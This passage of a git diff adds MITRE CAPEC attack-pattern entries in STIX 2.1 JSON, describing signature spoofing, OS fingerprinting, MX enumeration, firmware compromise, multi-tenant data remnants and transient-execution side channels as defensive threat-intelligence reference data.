+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Medium",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json
new file mode 100644
index 0000000000000000000000000000000000000000..eaad4fdc738af4ea46378e395cea01d266f98ae6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json
@@ -0,0 +1,90 @@
+{
+ "id": "bundle--931b26a6-c34e-4658-9e98-1fa61c17e015",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-473",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/473.html"
+ },
+ {
+ "external_id": "CWE-20",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/20.html"
+ },
+ {
+ "external_id": "CWE-327",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/327.html"
+ },
+ {
+ "external_id": "CWE-290",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/290.html"
+ },
+ {
+ "description": "Masquerading: Invalid Code Signature",
+ "external_id": "T1036.001",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1036/001"
+ },
+ {
+ "description": "Subvert Trust Controls: Code Signing",
+ "external_id": "T1553.002",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1553/002"
+ }
+ ],
+ "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Signature Spoof",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Gain Privileges"
+ ],
+ "Authentication": [
+ "Gain Privileges"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_example_instances": [
+ "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.",
+ "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor."
+ ],
+ "x_capec_parent_of_refs": [
+ "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55",
+ "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f",
+ "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18",
+ "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37",
+ "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62",
+ "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7",
+ "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47"
+ ],
+ "x_capec_prerequisites": [
+ "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.",
+ "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature."
+ ],
+ "x_capec_skills_required": {
+ "High": "Technical understanding of how signature verification algorithms work with data and applications"
+ },
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json
new file mode 100644
index 0000000000000000000000000000000000000000..bb5730e3f70e17af710e8e58e4efa3b992cded3a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json
@@ -0,0 +1,87 @@
+{
+ "id": "bundle--2fd0055a-1a51-4263-94ea-00390cd366ce",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-332",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/332.html"
+ },
+ {
+ "external_id": "CWE-204",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/204.html"
+ },
+ {
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+ "external_id": "REF-33",
+ "source_name": "reference_from_CAPEC"
+ },
+ {
+ "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
+ "external_id": "REF-123",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.faqs.org/rfcs/rfc792.html"
+ },
+ {
+ "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10",
+ "external_id": "REF-124",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.faqs.org/rfcs/rfc1122.html"
+ },
+ {
+ "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group",
+ "external_id": "REF-262",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf"
+ }
+ ],
+ "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "ICMP IP 'ID' Field Error Message Probe",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Authorization": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Confidentiality": [
+ "Read Data",
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ",
+ "x_capec_likelihood_of_attack": "Medium",
+ "x_capec_prerequisites": [
+ "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card."
+ ],
+ "x_capec_resources_required": [
+ "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\""
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json
new file mode 100644
index 0000000000000000000000000000000000000000..ad822c4b224befbb09c40ad72b8f4a164d4ab435
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json
@@ -0,0 +1,67 @@
+{
+ "id": "bundle--7aa617f5-ad93-45ca-9052-108959f87a6c",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-290",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/290.html"
+ },
+ {
+ "external_id": "CWE-200",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
+ },
+ {
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+ "external_id": "REF-33",
+ "source_name": "reference_from_CAPEC"
+ }
+ ],
+ "id": "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "Enumerate Mail Exchange (MX) Records",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Authorization": [
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ],
+ "Confidentiality": [
+ "Other",
+ "Bypass Protection Mechanism",
+ "Hide Activities"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_prerequisites": [
+ "The adversary requires access to a DNS server that will return the MX records for a network."
+ ],
+ "x_capec_resources_required": [
+ "A command-line utility or other application capable of sending requests to the DNS server is necessary."
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json
new file mode 100644
index 0000000000000000000000000000000000000000..1b087b413c6c437e6a6e116836bc57b064f3fecd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json
@@ -0,0 +1,74 @@
+{
+ "id": "bundle--e523d9a5-bba2-4b44-b731-572b4503a6b9",
+ "objects": [
+ {
+ "created": "2021-10-21T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ",
+ "external_references": [
+ {
+ "external_id": "CAPEC-677",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/677.html"
+ },
+ {
+ "description": "Supply Chain Compromise: Compromise Hardware Supply Chain",
+ "external_id": "T1195.003",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1195/003"
+ },
+ {
+ "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
+ "external_id": "REF-439",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf"
+ },
+ {
+ "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering",
+ "external_id": "REF-660",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html"
+ },
+ {
+ "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ",
+ "external_id": "REF-685",
+ "source_name": "reference_from_CAPEC",
+ "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild"
+ }
+ ],
+ "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "Server Motherboard Compromise",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e"
+ ],
+ "x_capec_consequences": {
+ "Integrity": [
+ "Execute Unauthorized Commands"
+ ]
+ },
+ "x_capec_domains": [
+ "Supply Chain",
+ "Physical Security",
+ "Hardware"
+ ],
+ "x_capec_example_instances": [
+ "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n "
+ ],
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_prerequisites": [
+ "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance."
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json
new file mode 100644
index 0000000000000000000000000000000000000000..80f14f7e8e1c1ec18e6b5279cca63e85c71db400
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json
@@ -0,0 +1,70 @@
+{
+ "id": "bundle--3a4054b5-32d2-4144-bdb3-e245b0d7d07a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-546",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/546.html"
+ },
+ {
+ "external_id": "CWE-284",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/284.html"
+ },
+ {
+ "external_id": "CWE-1266",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1266.html"
+ },
+ {
+ "external_id": "CWE-1272",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1272.html"
+ },
+ {
+ "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop",
+ "external_id": "REF-461",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf"
+ }
+ ],
+ "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "Incomplete Data Deletion in a Multi-Tenant Environment",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7"
+ ],
+ "x_capec_consequences": {
+ "Confidentiality": [
+ "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)"
+ ]
+ },
+ "x_capec_domains": [
+ "Software",
+ "Hardware"
+ ],
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_prerequisites": [
+ "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system."
+ ],
+ "x_capec_skills_required": {
+ "Low": "The adversary requires the ability to traverse directory structure."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Medium",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json
new file mode 100644
index 0000000000000000000000000000000000000000..d5e21b6f883fa6b84b64e3e1c874ffd8a32fea3b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json
@@ -0,0 +1,133 @@
+{
+ "id": "bundle--5c484e30-9b92-40e0-83d8-41e3beaef4d6",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-663",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/663.html"
+ },
+ {
+ "external_id": "CWE-1037",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1037.html"
+ },
+ {
+ "external_id": "CWE-1303",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1303.html"
+ },
+ {
+ "external_id": "CWE-1264",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1264.html"
+ },
+ {
+ "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology",
+ "external_id": "REF-637",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://spectreattack.com/spectre.pdf"
+ },
+ {
+ "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology",
+ "external_id": "REF-638",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://meltdownattack.com/meltdown.pdf"
+ },
+ {
+ "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology",
+ "external_id": "REF-639",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://arxiv.org/abs/1811.05441"
+ },
+ {
+ "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering",
+ "external_id": "REF-640",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://eprint.iacr.org/2016/613.pdf"
+ },
+ {
+ "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum",
+ "external_id": "REF-641",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked"
+ },
+ {
+ "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic",
+ "external_id": "REF-642",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked"
+ },
+ {
+ "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA",
+ "external_id": "REF-643",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A"
+ }
+ ],
+ "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "Exploitation of Transient Instruction Execution",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_can_precede_refs": [
+ "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78",
+ "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism"
+ ],
+ "Authorization": [
+ "Execute Unauthorized Commands"
+ ],
+ "Confidentiality": [
+ "Read Data"
+ ]
+ },
+ "x_capec_domains": [
+ "Software",
+ "Hardware",
+ "Software"
+ ],
+ "x_capec_example_instances": [
+ "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n "
+ ],
+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.
  3. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

  4. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

  3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

  2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
",
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd"
+ ],
+ "x_capec_peer_of_refs": [
+ "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59",
+ "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947",
+ "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac"
+ ],
+ "x_capec_prerequisites": [
+ "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU."
+ ],
+ "x_capec_resources_required": [
+ "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.",
+ "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine."
+ ],
+ "x_capec_skills_required": {
+ "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage."
+ },
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "Very High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json
new file mode 100644
index 0000000000000000000000000000000000000000..dc5a7164180dbb548ef3fe44f72352f9c1412739
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--74b9eb9f-7dd5-4eda-81d5-8a2cd5041ccf",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-566",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/566.html"
+ }
+ ],
+ "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c",
+ "modified": "2019-04-04T00:00:00.000Z",
+ "name": "DEPRECATED: Dump Password Hashes",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json
new file mode 100644
index 0000000000000000000000000000000000000000..d218c0dd7477b1a9321f7dd8868e92afe2228dad
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json
@@ -0,0 +1,141 @@
+{
+ "id": "bundle--fae5e517-e599-4b89-9501-4401ee205d22",
+ "objects": [
+ {
+ "created": "2020-07-30T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
